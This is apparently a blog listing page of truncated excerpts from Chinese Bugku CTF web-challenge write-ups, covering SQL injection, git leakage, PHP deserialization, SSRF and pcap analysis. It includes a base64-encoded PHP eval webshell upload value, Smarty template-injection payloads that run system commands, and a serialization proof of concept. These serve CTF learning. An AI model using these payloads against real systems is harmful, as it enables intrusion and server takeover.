Bugku-web34（文件包含）

访问css样式之后得到提示：扒下代码：：<?phperror_reporting(0);$KEY='ctf.bugku.com';include_once("flag.php");$cookie = $_COOKIE['BUGKU'];if(isset($_GET['20260'])){    show_source(__FILE__);}elseif (unserialize($cookie) ......

这个题目对于我来说还是很有难度的；；；毕竟我菜；；；唉；；；打开页面是个登录界面：：扫描看了一圈发现这个images下面有这个sql的图片，这个是sql注入问题没错了，但是怎么注入是个问题；；sql注入学的太菜了；还是好好补基础；看了各种大师傅的blog还是挺懵逼的；；；selectuserfrommysql.userwhereuser=......

不能放过任何提示或是编码：参考博客：：https://blog.csdn.net/qq_41209264/article/details/112300712$sql="SELECTusername,passwordFROMadminWHEREusername='".$username."'";if(!empty($row)&&$row['password']===md5($passwo......

传入cipher：：o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5YSNE3oDfyc1WXAyLMW8RbiwIX9dyKMF5uwWSEzJVCKxOsDnVcQ%3D%3D传入的vi：：L4p%2BUXpwki%2FiUktyYxs7eg%3D%3D<?phpheader("Content-Type:text/html;charset=utf-8");#计算cipher/*明文1：a:2:{s:8:&q......

这题考察的是git信息泄露，挺好的题目；；我都不懂git信息泄露是什么鬼用dirsearch扫描后有.git目录，电脑浏览器访问发现不了什么，看了大哥的博客，用kali里面的git命令，现在学习一下这些命令：：wget递归下载：：gitreflog：：查看执行的命令日志gitresetcommit_id：：回退到该版本的版本库gitshow......

该题目涉及到了序列化；Base64解码；cgi；ssrf；php中的file协议；代码审计，我只知道涉及到了序列化，还有我提交的方法是POST的，其他的我都不是很懂了，所以看了别人的wp；；https://blog.csdn.net/qq_53460654/article/details/116329685<?php// php版本:5.4.44header("Content-type: text/h......

php序列化的一个题目；；参考博客：https://blog.csdn.net/weixin_44190459/article/details/116648636目前还没有搞明白怎么一回事：<?phpclassctf{protected$username='admin';protected$cmd='tacflag.php';}$ctf=newctf();echoserialize($ctf);;?>......

注入点在上传图片处，图片上传后会被base64编码，就从这里入手，上传一句话木马；image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1BPU1RbJ2ZsYWcnXSk7Pz4=......

smarty模板注入常用的payload常用payload常用payload{ifphpinfo()}{/if}{ifsystem('ls')}{/if}{ifreadfile('/flag')}{/if}{ifshow_source('/flag')}{/if}{ifsystem('cat../../../flag')}{/if}smarty中的{if}标签中可以执行php语句随便传参可......

刚结束的ciscn，里面的要是有这么简单就好了。下载附件，是个pcap文件，打开wireshark分析一节一节看过去就找到了flag没难度的~~~......